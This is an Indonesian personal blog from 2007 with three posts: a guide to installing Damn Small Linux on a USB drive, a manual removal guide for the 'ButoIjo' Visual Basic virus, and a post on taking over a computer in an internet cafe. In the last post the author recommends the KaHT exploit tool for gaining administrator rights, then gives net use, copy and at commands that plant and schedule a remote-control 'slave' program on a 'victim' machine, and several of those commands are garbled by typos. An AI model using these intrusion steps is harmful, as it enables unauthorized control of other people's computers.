Selasa, 07 Agustus 2007

install Damn Small Linux di USB

BAgi yang InGin beljar linux, tanpa harus menginstall nya di komputer, kini ada cara yang lebih jitu, yaitu dengan menginstallnya di usb flashdisk, distro linux mini ini (damn small linux) atau disingkat dsl. bisa diinstall pada usb berkapasitas 128 mb, cos distro ini hanya membutuhkan space 64 mb dari flashdisk anda, selain itu, dsl bisa dijalanin tanpa mereboot komputer, yaitu dengan menggunakan qemu emulator, penasaran kan???? plototin aja nih artikel,

tool yang kita butuhkan:
  • flasdisk ukuran 64MB atau yang lebih besar
  • HP-USB Format tool hanya bersifat optional
  • 7-Zip atau apa aja yang penting bisa mengekstrak file zip
  • Syslinux
  • dsl-embedded.zip
cara instalasi:
  1. download hp-usb format tool untuk memmformat flashdisk dengan menambahkan option fat32
  2. download dsl-embedded.zip dan ekstrak lah ke flasdisk anda
  3. download syslinux-3.3.6.zip dan ekstrak di komputer anda dengan direktori sysylinux
  4. masuk ke cmd prompt, lalu ketik cd\sysylinux\win32
  5. ketikan sysylinux.exe -ma flasdisk_anda, supaya fdisk anda dapat diboot
  6. re-boot komputer anda dan masuk ke bios untuk menyeting spy komputer booting dari fdisk anda.
  7. selesai deh,
end note:
dengan menggunakan qemu emulator, anda tidak usah repot2 mereboot komputer anda, cos kita bisa menjalankan dsl lewat tool emulasi atau virtual machine ini.

selamat mencoba


Kamis, 02 Agustus 2007

ilangin virus manual

Code nameBUTOIJO@w32.daddy
CRC32 : 7D21DC75
Ukuran : 74.4 kb

Virus ini dibuat dengan visual basic, jadi jika anda terinfeksi cukup booting dengan CD windows XP bootable, kemudian pilih REPAIR dan ubah file dengan nama MSVBVM60.DLL yang ada di direktori c:\windows\sytem32 dengan nama lain, misalnya MSVBXXXX.XXX, kemudian restart, maka virus tidak berjalan lagih...

CIRI – CIRI YANG TERKENA VIRUS
1. Blok regedit / registry windows
2. Disabel task manager
3. Meneyembunyikan folder option
4. menyembunyikan run
5. menyembunyikan find
6. menyembunyikan context menu
7. menyembunyikan control panel
8. Merubah organization menjadi buto ijo
9. merubah owner menjadi buto ijo
10. merubah tampilan wallpaper
Semuanya berukuran 74.4 kb dan mempunyai nilai crc32-nya 7D21DC75

FILE PEMICU VIRUS
File pemicu virus tersebut ada di tiap drive anda, yaitu di:

A:\Butoijo.exe
B:\Butoijo.exe
C:\Butoijo.exe
D:\Butoijo.exe
E:\Butoijo.exe
F:\Butoijo.exe
G:\Butoijo.exe
H:\Butoijo.exe

PESAN – PESAN YANG DIMUNCULKAN
Pesan dari butoijo hanya memunculkan kalau si virus itu ada di komputer anda, begini pesannya:

”virus ButoIjo bersarang di computer anda”


MANIPULASI REGISTRI
Registry yang telah dimanipulasi oleh virus ini:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel""HKLM\Software\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization,"BUTOIJO"
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\RegisteredOwner, " 1"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies, "ActiveDesktop\NoChangingWallpaper"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"


PENANGGULANGAN
1. Seperti biasa donlot pengontrol virus di www.virologi.info/download/ , yaitu showkillprocess, acep.scr atau acep.exe dan WAV 2005:


Kemudian matikan proses dengan nama berikut ini:

A:\Butoijo.exe
B:\Butoijo.exe
C:\Butoijo.exe
D:\Butoijo.exe
E:\Butoijo.exe
F:\Butoijo.exe
G:\Butoijo.exe
H:\Butoijo.exe


2. Scan Hardisk anda dengan WAV 2005 update terbaru
3. Jika belum puas cari file berekstensi .exe dengan ukuran 74.4kb dan mempunyai icon folder berwarna kuning, kemudian hapus.
4. Cari dan hapus file dengan nama:

A:\Butoijo.exe
B:\Butoijo.exe
C:\Butoijo.exe
D:\Butoijo.exe
E:\Butoijo.exe
F:\Butoijo.exe
G:\Butoijo.exe
H:\Butoijo.exe

5. Hapus registry yang ada di alamat berikut:

HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCpl"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel""HKLM\Software\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization,"BUTOIJO"
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\RegisteredOwner, " 1"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies, "ActiveDesktop\NoChangingWallpaper"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt"
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden"



6. Kemudian restart komputer anda …
7. Jika masi ada ulangi langkah tadi …


submer: www.virologi.info

remote pc with RA



WARNING!!!
Penulis tidak bertanggung jawab terhadap segala kesalahan yang diakibatkan oleh penyalahgunaan artikel ini.

Suatu hari,saat menggunakan computer di sebuah warnet, saya dibuat kesel oleh sang bos yang tidak memperbolehkan saya men-copy master office di computer bilingnya, padahal saya sudah bilang secara baik-baik pada penjaga warnet tersebut, dengan agak kesal aku mencoba berselancar dengan mbah google mencari program remote untuk jaringan LAN, eh ternyata nasib saya sedang beruntung, saya nemu program namanya remote-anything, mau kenalan ga ma nih program, nig gue kenalin:

1. terdiri dari dua bagian penting, master.exe dan slave.exe, master dijalankan di computer kita, sedang slave dijalankan di komputer korban. Terus cara nginstall slave gimana?
pertama dapatkan dulu hak administrator, hal ini bisa dilakukan dengan menggunakan program KaHT.
Terus abis kita jadi sang admin, install tuh program slave.exe di computer sasaran. Caranya:masuklan pada jendela command prompt,

net use \\192.168.2.100 isi dengan IP pada computer korban.
\IPC$ /user:administrator password (isi dengan password admin)

Copy “C:\slave.exe” \\192.168.2.100\C$\windows (perintah untuk men-copy slave dari computer kita ke direktori c:\windows pada computer korban.

Setelah berhasil men-copy kan program slave.exe pada computer korban, sekarang jalankan program tersebut, crania masih dengan menggunakan command prompt

Netsvc \\192.168.2.100
Net tome \\1912.168.2.100

At \\192.168.2.100 10:00 “c:\windows\slave.exe” (perintah agar program slave.exe berjalan secara otomatis pada jam 10:00)

Setelag semuanya beres, maqsud saya program slave.exe sudah dijalankan computer korban, jalankan file master.exe dengan cara menkliknya dua kali, klik pada icon berbentuk teropong untuk mencari keberadaan korban, kalo udah ketemu klik-dobel pada ip address yang tertera di program master
Sekarang anda telah menguasai computer tersebut dengan sepenuh hati

Thank’s to: Allah s.w.t yang telah memberiku super computer kepada saya, berupa otak gua.
Mbah google yang selalu menjadi petunjuk arah di dunia antah berantah (maksudnya di internet)
Temen-temen yo yogyafree yang telah memberikan membagikan ilmu dan aji-ajinya kepada saya.
Dan semau aja deh yang mau membaca arrtiekl ini.

Oleh:91n_xNuX3r
e-mail: ahmadelfatano@gmail.com